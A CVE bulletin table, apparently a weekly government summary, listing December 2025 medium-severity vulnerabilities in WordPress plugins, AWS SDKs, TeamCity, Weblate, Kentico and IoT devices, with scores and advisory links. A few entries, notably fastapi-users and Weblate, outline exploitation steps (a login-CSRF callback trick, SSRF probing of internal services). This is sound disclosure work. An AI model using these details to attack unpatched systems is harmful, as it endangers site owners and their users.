| https://www.radiometer.com/myradiometer |
| damian-gora--FiboSearch Ajax Search for WooCommerce | The FiboSearch - Ajax Search for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `thegem_te_search` shortcode in all versions up to, and including, 1.32.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires TheGem theme (premium) to be installed with Header Builder mode enabled, and the FiboSearch "Replace search bars" option enabled for TheGem integration. | 2025-12-20 | 5.4 | CVE-2025-14298 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8149103e-105d-401d-8a15-b07d131baaac?source=cve https://wordpress.org/plugins/ajax-search-for-woocommerce https://plugins.trac.wordpress.org/browser/ajax-search-for-woocommerce/tags/1.32.0/partials/themes/thegem-elementor.php#L94 https://plugins.trac.wordpress.org/browser/ajax-search-for-woocommerce/tags/1.32.0/partials/themes/thegem-elementor.php#L104 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3420841%40ajax-search-for-woocommerce%2Ftrunk&old=3398612%40ajax-search-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=#file136 |
| wpchill--Image Photo Gallery Final Tiles Grid | The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 3.6.7. This is due to the plugin not properly verifying that a user is authorized to perform actions on gallery management functions. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete, modify, or clone galleries created by any user, including administrators. | 2025-12-19 | 5.4 | CVE-2025-14455 | https://www.wordfence.com/threat-intel/vulnerabilities/id/830663b6-0786-48c7-9ffd-ac3ba2bd3e0c?source=cve https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.7/FinalTilesGalleryLite.php#L528 https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.7/FinalTilesGalleryLite.php#L684 https://plugins.trac.wordpress.org/browser/final-tiles-grid-gallery-lite/tags/3.6.7/FinalTilesGalleryLite.php#L213 https://plugins.trac.wordpress.org/changeset/3417363/final-tiles-grid-gallery-lite/trunk/FinalTilesGalleryLite.php |
| Gralp Systems--Fortimus Series | A vulnerability in the web interface of the Güralp Fortimus Series, Minimus Series and Certimus Series allows an unauthenticated attacker with network access to send specially-crafted HTTP requests that can cause the web service process to deliberately restart. Although this mechanism limits the impact of the attack, it results in a brief denial-of-service condition during the restart. | 2025-12-16 | 5.3 | CVE-2025-14466 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-350-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-350-01.json |
| niao70--F70 Lead Document Download | The F70 Lead Document Download plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'file_download' function in all versions up to, and including, 1.4.4. This makes it possible for unauthenticated attackers to download any file from the WordPress media library by guessing or enumerating WordPress attachment IDs. | 2025-12-20 | 5.3 | CVE-2025-14633 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bba22270-de9b-4651-8180-c077ef113112?source=cve https://plugins.trac.wordpress.org/browser/f70-lead-document-download/trunk/includes/class.download.php#L61 https://plugins.trac.wordpress.org/browser/f70-lead-document-download/tags/1.4.4/includes/class.download.php#L61 |
| Shenzhen Sixun Software--Sixun Shanghui Group Business Management System | A vulnerability was identified in Shenzhen Sixun Software Sixun Shanghui Group Business Management System 4.10.24.3. Affected by this vulnerability is an unknown functionality of the file /api/GylOperator/UpdatePasswordBatch. The manipulation leads to weak password recovery. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 5.3 | CVE-2025-14696 | VDB-336414 | Shenzhen Sixun Software Sixun Shanghui Group Business Management System UpdatePasswordBatch password recovery VDB-336414 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705601 | Shenzhen Sixun Software Co., Ltd. Sissyun Shanghui 7 Online Business System 4.10.24.3 Unauthorized https://github.com/zhangbuneng/Sissyun-Shanghui-7-Unauthorized-password-modificationfication-vulnerability./issues/1 https://github.com/zhangbuneng/Sissyun-Shanghui-7-Unauthorized-password-modificationfication-vulnerability./issues/1#issue-3688839620 |
| Municorn--FAX App | A security vulnerability has been detected in Municorn FAX App 3.27.0 on Android. This vulnerability affects unknown code of the component biz.faxapp.app. Such manipulation leads to path traversal. The attack needs to be performed locally. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 5.3 | CVE-2025-14699 | VDB-336417 | Municorn FAX App biz.faxapp.app path traversal VDB-336417 | CTI Indicators (IOB, IOC, TTP) Submit #706215 | MUNICORN LIMITED(https://comfax.com/) FAX App: Send Faxes from Phone APP (biz.faxapp.app) Version:V3.27.0 Path Traversal https://github.com/Secsys-FDU/AF_CVEs/issues/3 |
| Shiguangwu--sgwbox N3 | A vulnerability has been found in Shiguangwu sgwbox N3 2.0.25. The affected element is an unknown function of the file /fsnotify of the component POST Message Handler. The manipulation of the argument token leads to improper authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 5.3 | CVE-2025-14703 | VDB-336420 | Shiguangwu sgwbox N3 POST Message fsnotify improper authentication VDB-336420 | CTI Indicators (IOB, IOC, IOA) Submit #706914 | sgwbox N3 NAS V2.0.25 Auth Bypass https://www.notion.so/sgwbox-NAS-N3-Auth-Bypass-2be6cf4e528a8092b261fbc2abc3430c?source=copy_link |
| mansoormunib--RESPONSIVE AND SWIPE SLIDER! | The Responsive and Swipe slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rsSlider shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-20 | 5.5 | CVE-2025-14721 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b82e6dce-b130-4025-b6e3-bde2350a6362?source=cve https://plugins.trac.wordpress.org/browser/responsive-and-swipe-slider/trunk/shortcode.php#L100 |
| nestornoe--Amazon affiliate lite Plugin | The Amazon affiliate lite Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the 'ADAL_settings_page' function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-20 | 5.4 | CVE-2025-14734 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8175ff00-e588-46cf-a743-9c4d4717657a?source=cve https://plugins.trac.wordpress.org/browser/afiliados-de-amazon-lite/trunk/ADAL-core.php?rev=1952216#L99 |
| Ningyuanda--TC155 | A vulnerability was determined in Ningyuanda TC155 57.0.2.0. This affects an unknown function of the file /onvif/device_service of the component ONVIF Device Management Service. Executing manipulation of the argument FactoryDefault with the input Hard can lead to improper access controls. The attack requires access to the local network. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-16 | 5.4 | CVE-2025-14748 | VDB-336521 | Ningyuanda TC155 ONVIF Device Management Service device_service access control VDB-336521 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707197 | Shenzhen Ningyuanda Technology Co., Ltd. TC155 IP Camera Firmware version: 57.0.2.0 Unauthenticated Hard Reset via ONVIF SetSystemFactoryDefault https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-Hard-Reset.md |
| AWS--S3 Encryption Client for .NET | Missing cryptographic key commitment in the Amazon S3 Encryption Client for .NET may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade Amazon S3 Encryption Client for .NET to version 3.2.0 or later. | 2025-12-17 | 5.3 | CVE-2025-14759 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/amazon-s3-encryption-client-dotnet/security/advisories/GHSA-4v42-65r3-3gjx https://github.com/aws/amazon-s3-encryption-client-dotnet/releases/tag/release_2025-12-17 |
| AWS--AWS SDK for C++ | Missing cryptographic key commitment in the AWS SDK for C++ may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade AWS SDK for C++ to version 1.11.712 or later | 2025-12-17 | 5.3 | CVE-2025-14760 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/aws-sdk-cpp/security/advisories/GHSA-792f-r46x-r7gm https://github.com/aws/aws-sdk-cpp/releases/tag/1.11.712 |
| AWS--AWS SDK for PHP | Missing cryptographic key commitment in the AWS SDK for PHP may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade AWS SDK for PHP to version 3.368.0 or later | 2025-12-17 | 5.3 | CVE-2025-14761 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/aws-sdk-php/security/advisories/GHSA-x8cp-jf6f-r4xh https://github.com/aws/aws-sdk-php/releases/tag/3.368.0 |
| AWS--AWS SDK for Ruby | Missing cryptographic key commitment in the AWS SDK for Ruby may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade AWS SDK for Ruby to version 1.208.0 or later. | 2025-12-17 | 5.3 | CVE-2025-14762 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/aws-sdk-ruby/security/advisories/GHSA-2xgq-q749-89fq https://rubygems.org/gems/aws-sdk-s3/versions/1.208.0 |
| AWS--S3 Encryption Client for Java | Missing cryptographic key commitment in the Amazon S3 Encryption Client for Java may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade Amazon S3 Encryption Client for Java to version 4.0.0 or later. | 2025-12-17 | 5.3 | CVE-2025-14763 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/amazon-s3-encryption-client-java/security/advisories/GHSA-x44p-gvrj-pj2r https://github.com/aws/amazon-s3-encryption-client-java/releases/tag/v4.0.0 |
| AWS--S3 Encryption Client for Go | Missing cryptographic key commitment in the Amazon S3 Encryption Client for Go may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade Amazon S3 Encryption Client for Go to version 4.0 or later. | 2025-12-17 | 5.3 | CVE-2025-14764 | https://aws.amazon.com/security/security-bulletins/AWS-2025-032/ https://github.com/aws/amazon-s3-encryption-client-go/security/advisories/GHSA-3g75-q268-r9r6 https://github.com/aws/amazon-s3-encryption-client-go/releases/tag/v4.0.0 |
| ConnectWise--ScreenConnect | In deployments using the ScreenConnect™ Certificate Signing Extension, encrypted configuration values including an Azure Key Vault-related key, could be returned to unauthenticated users through a client-facing endpoint under certain conditions. The values remained encrypted and securely stored at rest; however, an encrypted representation could be exposed in client responses. Updating the Certificate Signing Extension to version 1.0.12 or higher ensures configuration handling occurs exclusively on the server side, preventing encrypted values from being transmitted to or rendered by client-side components. | 2025-12-18 | 5.3 | CVE-2025-14823 | https://www.connectwise.com/company/trust/security-bulletins/2025-12-18-screenconnect-certificate-signing-extension-update |
| Red Hat--Red Hat Advanced Cluster Management for Kubernetes 2 | A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser. | 2025-12-18 | 5.3 | CVE-2025-14874 | https://access.redhat.com/security/cve/CVE-2025-14874 RHBZ#2418133 https://github.com/nodemailer/nodemailer https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150 https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v |
| Campcodes--Advanced Voting Management System | A security flaw has been discovered in Campcodes Advanced Voting Management System 1.0. The impacted element is an unknown function of the file /admin/voters_edit.php of the component Password Handler. Performing manipulation of the argument ID results in improper authorization. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. | 2025-12-18 | 5.4 | CVE-2025-14889 | VDB-337378 | Campcodes Advanced Voting Management System Password voters_edit.php improper authorization VDB-337378 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715643 | campcodes Advanced Voting Management System using PHP/MySQLi 1.0 Authentication Bypass https://gist.github.com/nikstudy576-maker/82e1e1ede9b848880aa09b87b92bc22c https://www.campcodes.com/ |
| WebAssembly--Binaryen | A vulnerability was determined in WebAssembly Binaryen up to 125. Affected by this issue is the function WasmBinaryReader::readExport of the file src/wasm/wasm-binary.cpp. This manipulation causes heap-based buffer overflow. It is possible to launch the attack on the local host. The exploit has been publicly disclosed and may be utilized. Patch name: 4f52bff8c4075b5630422f902dd92a0af2c9f398. It is recommended to apply a patch to fix this issue. | 2025-12-19 | 5.3 | CVE-2025-14956 | VDB-337592 | WebAssembly Binaryen wasm-binary.cpp readExport heap-based overflow VDB-337592 | CTI Indicators (IOB, IOC, IOA) Submit #717315 | WebAssembly binaryen 9a226ac Heap-based Buffer Overflow https://github.com/WebAssembly/binaryen/issues/8089 https://github.com/WebAssembly/binaryen/pull/8092 https://github.com/oneafter/1204/blob/main/hbf https://github.com/WebAssembly/binaryen/commit/4f52bff8c4075b5630422f902dd92a0af2c9f398 |
| floooh--sokol | A security flaw has been discovered in floooh sokol up to 33e2271c431bf21de001e972f72da17a984da932. This vulnerability affects the function _sg_pipeline_common_init in the library sokol_gfx.h. Performing manipulation results in heap-based buffer overflow. The attack needs to be approached locally. The exploit has been released to the public and may be exploited. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The patch is named 33e2271c431bf21de001e972f72da17a984da932. It is suggested to install a patch to address this issue. | 2025-12-19 | 5.3 | CVE-2025-14958 | VDB-337594 | floooh sokol sokol_gfx.h _sg_pipeline_common_init heap-based overflow VDB-337594 | CTI Indicators (IOB, IOC, IOA) Submit #717320 | floooh sokol e0832c9 Heap-based Buffer Overflow https://github.com/floooh/sokol/issues/1406 https://github.com/floooh/sokol/issues/1406#issuecomment-3649515551 https://github.com/oneafter/1212/blob/main/hbf1 https://github.com/seyhajin/sokol/commit/33e2271c431bf21de001e972f72da17a984da932 |
| 1541492390c--yougou-mall | A vulnerability was found in 1541492390c yougou-mall up to 0a771fa817c924efe52c8fe0a9a6658eee675f9f. This impacts the function Upload of the file src/main/java/per/ccm/ygmall/extra/controller/ResourceController.java. Performing manipulation results in path traversal. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. | 2025-12-19 | 5.5 | CVE-2025-14965 | VDB-337600 | 1541492390c yougou-mall ResourceController.java upload path traversal VDB-337600 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #717732 | https://github.com/1541492390c/yougou-mall?tab=readme-ov-file yougou-mall 1.0 Upload any file https://github.com/zyhzheng500-maker/cve/blob/main/yougou-mall%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md |
| Restajet Information Technologies Inc.--Online Food Delivery System | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Phishing, Forceful Browsing.This issue affects Online Food Delivery System: through 19122025. | 2025-12-19 | 5.4 | CVE-2025-1885 | https://www.usom.gov.tr/bildirim/tr-25-0469 |
| IBM--UCD - IBM UrbanCode Deploy | IBM UCD - IBM UrbanCode Deploy 7.1 through 7.1.2.27, 7.2 through 7.2.3.20, and 7.3 through 7.3.2.15 and IBM UCD - IBM DevOps Deploy 8.0 through 8.0.1.10, and 8.1 through 8.1.2.3 is susceptible to a race condition in http-session client-IP binding enforcement which may allow a session to be briefly reused from a new IP address before it is invalidated, potentially enabling unauthorized access under certain network conditions. | 2025-12-15 | 5 | CVE-2025-36360 | https://www.ibm.com/support/pages/node/7254661 |
| Elastic--Kibana | Improper neutralization of input during web page generation ('Cross-site Scripting') (CWE-79) allows an authenticated user to render HTML tags within a user's browser via the integration package upload functionality. This issue is related to ESA-2025-17 (CVE-2025-25018) bypassing that fix to achieve HTML injection. | 2025-12-15 | 5.4 | CVE-2025-37732 | https://discuss.elastic.co/t/kibana-8-19-8-9-1-8-and-9-2-2-security-update-esa-2025-28/384064 |
| avahi--avahi | Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In versions up to and including 0.9-rc2, the simple protocol server ignores the documented client limit and accepts unlimited connections, allowing for easy local DoS. Although `CLIENTS_MAX` is defined, `server_work()` unconditionally `accept()`s and `client_new()` always appends the new client and increments `n_clients`. There is no check against the limit. When client cannot be accepted as a result of maximal socket number of avahi-daemon, it logs unconditionally error per each connection. Unprivileged local users can exhaust daemon memory and file descriptors, causing a denial of service system-wide for mDNS/DNS-SD. Exhausting local file descriptors causes increased system load caused by logging errors of each of request. Overloading prevents glibc calls using nss-mdns plugins to resolve `*.local.` names and link-local addresses. As of time of publication, no known patched versions are available, but a candidate fix is available in pull request 808, and some workarounds are available. Simple clients are offered for nss-mdns package functionality. It is not possible to disable the unix socket `/run/avahi-daemon/socket`, but resolution requests received via DBus are not affected directly. Tools avahi-resolve, avahi-resolve-address and avahi-resolve-host-name are not affected, they use DBus interface. It is possible to change permissions of unix socket after avahi-daemon is started. But avahi-daemon does not provide any configuration for it. Additional access restrictions like SELinux can also prevent unwanted tools to access the socket and keep resolution working for trusted users. | 2025-12-18 | 5.5 | CVE-2025-59529 | https://github.com/avahi/avahi/security/advisories/GHSA-73wf-3xmj-x82q https://github.com/avahi/avahi/pull/808 https://zeropath.com/blog/avahi-simple-protocol-server-dos-cve-2025-59529 |
| FreshRSS--FreshRSS | FreshRSS is a free, self-hostable RSS aggregator. Versions prior to 1.27.1 have a logout cross-site request forgery vulnerability that can lead to denial of service via <track src>. Version 1.27.1 patches the issue. | 2025-12-18 | 5.3 | CVE-2025-59949 | https://github.com/FreshRSS/FreshRSS/security/advisories/GHSA-w7f5-8vf9-f966 https://github.com/FreshRSS/FreshRSS/pull/7958 https://github.com/FreshRSS/FreshRSS/pull/7997 https://github.com/FreshRSS/FreshRSS/pull/7999 |
| HCL Software--DevOps Deploy / Launch | HCL DevOps Deploy / HCL Launch is susceptible to a race condition in http-session client-IP binding enforcement which may allow a session to be briefly reused from a new IP address before it is invalidated. This could lead to unauthorized access under certain network conditions. | 2025-12-16 | 5 | CVE-2025-62329 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127332 |
| HCL Software--DevOps Deploy | HCL DevOps Deploy is susceptible to a cleartext transmission of sensitive information because the HTTP port remains accessible and does not redirect to HTTPS as intended. As a result, an attacker with network access could intercept or modify user credentials and session-related data via passive monitoring or man-in-the-middle attacks. | 2025-12-16 | 5.9 | CVE-2025-62330 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127333 |
| Sparkle WP--Construction Light | Missing Authorization vulnerability in Sparkle WP Construction Light allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Construction Light: from n/a through 1.6.7. | 2025-12-18 | 5.4 | CVE-2025-62960 | https://vdp.patchstack.com/database/wordpress/theme/construction-light/vulnerability/wordpress-construction-light-theme-1-6-7-broken-access-control-vulnerability?_s_id=cve |
| Sparkle WP--Sparkle FSE | Missing Authorization vulnerability in Sparkle WP Sparkle FSE allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sparkle FSE: from n/a through 1.0.9. | 2025-12-18 | 5.4 | CVE-2025-62961 | https://vdp.patchstack.com/database/wordpress/theme/sparkle-fse/vulnerability/wordpress-sparkle-fse-theme-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| WP Messiah--WP AI CoPilot | Insertion of Sensitive Information Into Sent Data vulnerability in WP Messiah WP AI CoPilot allows Retrieve Embedded Sensitive Data.This issue affects WP AI CoPilot: from n/a through 1.2.7. | 2025-12-18 | 5 | CVE-2025-62998 | https://vdp.patchstack.com/database/wordpress/plugin/ai-co-pilot-for-wp/vulnerability/wordpress-wp-ai-copilot-plugin-1-2-7-sensitive-data-exposure-vulnerability?_s_id=cve |
| wpforchurch--Sermon Manager | Missing Authorization vulnerability in wpforchurch Sermon Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sermon Manager: from n/a through 2.30.0. | 2025-12-18 | 5.3 | CVE-2025-63002 | https://vdp.patchstack.com/database/wordpress/plugin/sermon-manager-for-wordpress/vulnerability/wordpress-sermon-manager-plugin-2-30-0-broken-access-control-vulnerability?_s_id=cve |
| PickPlugins--Post Grid and Gutenberg Blocks | Authorization Bypass Through User-Controlled Key vulnerability in PickPlugins Post Grid and Gutenberg Blocks allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Grid and Gutenberg Blocks: from n/a through 2.3.19. | 2025-12-18 | 5.3 | CVE-2025-63043 | https://vdp.patchstack.com/database/wordpress/plugin/post-grid/vulnerability/wordpress-post-grid-and-gutenberg-blocks-plugin-2-3-19-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| WeblateOrg--weblate | Weblate is a web based localization tool. The Create Component functionality in Weblate allows authorized users to add new translation components by specifying both a version control system and a source code repository URL to pull from. However, prior to version 5.15, the repository URL field is not validated or sanitized, allowing an attacker to supply arbitrary protocols, hostnames, and IP addresses, including localhost, internal network addresses, and local filenames. When the Mercurial version control system is selected, Weblate exposes the full server-side HTTP response for the provided URL. This effectively creates a server-side request forgery (SSRF) primitive that can probe internal services and return their contents. In addition to accessing internal HTTP endpoints, the behavior also enables local file enumeration by attempting file:// requests. While file contents may not always be returned, the application's error messages clearly differentiate between files that exist and files that do not, revealing information about the server's filesystem layout. In cloud environments, this behavior is particularly dangerous, as internal-only endpoints such as cloud metadata services may be accessible, potentially leading to credential disclosure and full environment compromise. This has been addressed in the Weblate 5.15 release. As a workaround, remove Mercurial from `VCS_BACKENDS`; the Git backend is not affected. The Git backend was already configured to block the file protocol and does not expose the HTTP response content in the error message. | 2025-12-15 | 5 | CVE-2025-66407 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-hfpv-mc5v-p9mm https://github.com/WeblateOrg/weblate/pull/17102 https://github.com/WeblateOrg/weblate/pull/17103 |
| Foxit Software Inc.--Foxit PDF Reader | A memory corruption vulnerability exists in the 3D annotation handling of Foxit PDF Reader due to insufficient bounds checking when parsing PRC data. When opening a PDF file containing malformed or specially crafted PRC content, out-of-bounds memory access may occur, resulting in memory corruption. | 2025-12-19 | 5.3 | CVE-2025-66496 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--Foxit PDF Reader | A memory corruption vulnerability exists in the 3D annotation handling of Foxit PDF Reader due to insufficient bounds checking when parsing PRC data. When opening a PDF file containing malformed or specially crafted PRC content, out-of-bounds memory access may occur, resulting in memory corruption. | 2025-12-19 | 5.3 | CVE-2025-66497 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--Foxit PDF Reader | A memory corruption vulnerability exists in the 3D annotation handling of Foxit PDF Reader due to insufficient bounds checking when parsing U3D data. When opening a PDF file containing malformed or specially crafted PRC content, out-of-bounds memory access may occur, resulting in memory corruption. | 2025-12-19 | 5.3 | CVE-2025-66498 | https://www.foxit.com/support/security-bulletins.html |
| WeblateOrg--weblate | Weblate is a web based localization tool. In versions prior to 5.15, it was possible to trigger repository updates for many repositories via a crafted webhook payload. Version 5.15 fixes the issue. As a workaround, disabling webhooks completely using ENABLE_HOOKS avoids this vulnerability. | 2025-12-16 | 5.3 | CVE-2025-67492 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-pj86-258h-qrvf https://github.com/WeblateOrg/weblate/pull/17221 |
| Mintlify--Mintlify Platform | The GitHub Integration API in Mintlify Platform before 2025-11-15 allows remote attackers to obtain sensitive repository metadata via the repository owner and name fields. It fails to validate that the repository owner and name fields provided during configuration belong to the specific GitHub App Installation ID associated with the user's organization. | 2025-12-19 | 5 | CVE-2025-67844 | https://www.mintlify.com/docs/changelog https://www.mintlify.com/blog/working-with-security-researchers-november-2025 https://kibty.town/blog/mintlify/ https://news.ycombinator.com/item?id=46317098 |
| MISP--MISP | In MISP before 2.5.28, app/View/Elements/Workflows/executionPath.ctp allows XSS in the workflow execution path. | 2025-12-15 | 5.4 | CVE-2025-67906 | https://github.com/MISP/MISP/commit/1f39deb572da7ecb5855e30ff3cc8cbcaa0c1054 https://vulnerability.circl.lu/vuln/gcve-1-2025-0031 https://github.com/franckferman/GCVE-1-2025-0030 https://github.com/MISP/MISP/compare/v2.5.27...v2.5.28 https://github.com/franckferman/CVE-2025-67906 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11 reflected XSS was possible on VCS Root setup | 2025-12-16 | 5.4 | CVE-2025-68165 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11 a DOM-based XSS was possible on the OAuth connections tab | 2025-12-16 | 5.4 | CVE-2025-68166 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11.1 reflected XSS was possible on the storage settings page | 2025-12-16 | 5.4 | CVE-2025-68268 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| JetBrains--IntelliJ IDEA | In JetBrains IntelliJ IDEA before 2025.3 missing confirmation allowed opening of untrusted remote projects over SSH | 2025-12-16 | 5.4 | CVE-2025-68269 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| Elastic--Packetbeat | Allocation of resources without limits or throttling (CWE-770) allows an unauthenticated remote attacker to cause excessive allocation (CAPEC-130) of memory and CPU via the integration of malicious IPv4 fragments, leading to a degradation in Packetbeat. | 2025-12-18 | 5.3 | CVE-2025-68388 | https://discuss.elastic.co/t/packetbeat-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-29/384177 |
| fastapi-users--fastapi-users | FastAPI Users allows users to quickly add a registration and authentication system to their FastAPI project. Prior to version 15.0.2, the OAuth login state tokens are completely stateless and carry no per-request entropy or any data that could link them to the session that initiated the OAuth flow. `generate_state_token()` is always called with an empty `state_data` dict, so the resulting JWT only contains the fixed audience claim plus an expiration timestamp. On callback, the library merely checks that the JWT verifies under `state_secret` and is unexpired; there is no attempt to match the state value to the browser that initiated the OAuth request, no correlation cookie, and no server-side cache. Any attacker can hit `/authorize`, capture the server-generated state, finish the upstream OAuth flow with their own provider account, and then trick a victim into loading `.../callback?code=<attacker_code>&state=<attacker_state>`. Because the state JWT is valid for any client for \~1 hour, the victim's browser will complete the flow. This leads to login CSRF. Depending on the app's logic, the login CSRF can lead to an account takeover of the victim account or to the victim user getting logged in to the attacker's account. Version 15.0.2 contains a patch for the issue. | 2025-12-19 | 5.9 | CVE-2025-68481 | https://github.com/fastapi-users/fastapi-users/security/advisories/GHSA-5j53-63w8-8625 https://github.com/fastapi-users/fastapi-users/commit/7cf413cd766b9cb0ab323ce424ddab2c0d235932 https://github.com/fastapi-users/fastapi-users/blob/bcee8c9b884de31decb5d799aead3974a0b5b158/fastapi_users/router/oauth.py#L111 https://github.com/fastapi-users/fastapi-users/blob/bcee8c9b884de31decb5d799aead3974a0b5b158/fastapi_users/router/oauth.py#L57 |
| Hitachi Vantara--Pentaho Data Integration and Analytics | Hitachi Vantara Pentaho Data Integration and Analytics Community Dashboard Framework prior to versions 10.2.0.4, including 9.3.0.x and 8.3.x display the full server stack trace when encountering an error within the GetCdfResource servlet. | 2025-12-15 | 5.3 | CVE-2025-9122 | https://support.pentaho.com/hc/en-us/articles/41833799577741--Resolved-Hitachi-Vantara-Pentaho-Business-Analytics-Server-Generation-of-Error-Message-Containing-Sensitive-Information-Versions-before-10-2-0-4-Impacted-CVE-2025-9122 |
| Kentico--Xperience | An information disclosure vulnerability in Kentico Xperience allows authenticated users to view sensitive system objects through the live site widget properties dialog. Attackers can exploit this vulnerability to access unauthorized system information without proper access controls. | 2025-12-18 | 4.3 | CVE-2019-25230 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.0 User Widget Information Disclosure |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via error messages containing specially crafted object names. This allows malicious scripts to execute in users' browsers when administrators view error messages in the administration interface. | 2025-12-18 | 4.6 | CVE-2020-36889 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.90 Administration Interface Stored XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to upload files with spoofed Content-Type that do not match file extensions. Attackers can exploit this vulnerability by uploading malicious files with manipulated MIME types, allowing malicious scripts to execute in users' browsers. | 2025-12-18 | 4.6 | CVE-2020-36891 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.49 File Upload Stored XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows administration users to inject malicious scripts via email marketing templates. Attackers can exploit this vulnerability to execute malicious scripts that could compromise user browsers and steal sensitive information. | 2025-12-18 | 4.6 | CVE-2022-50680 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.92 Email Marketing Stored XSS |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via form redirect URL configuration. This allows malicious scripts to execute in users' browsers through unvalidated form configuration settings. | 2025-12-18 | 4.6 | CVE-2022-50683 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.74 Form Configuration Stored XSS |
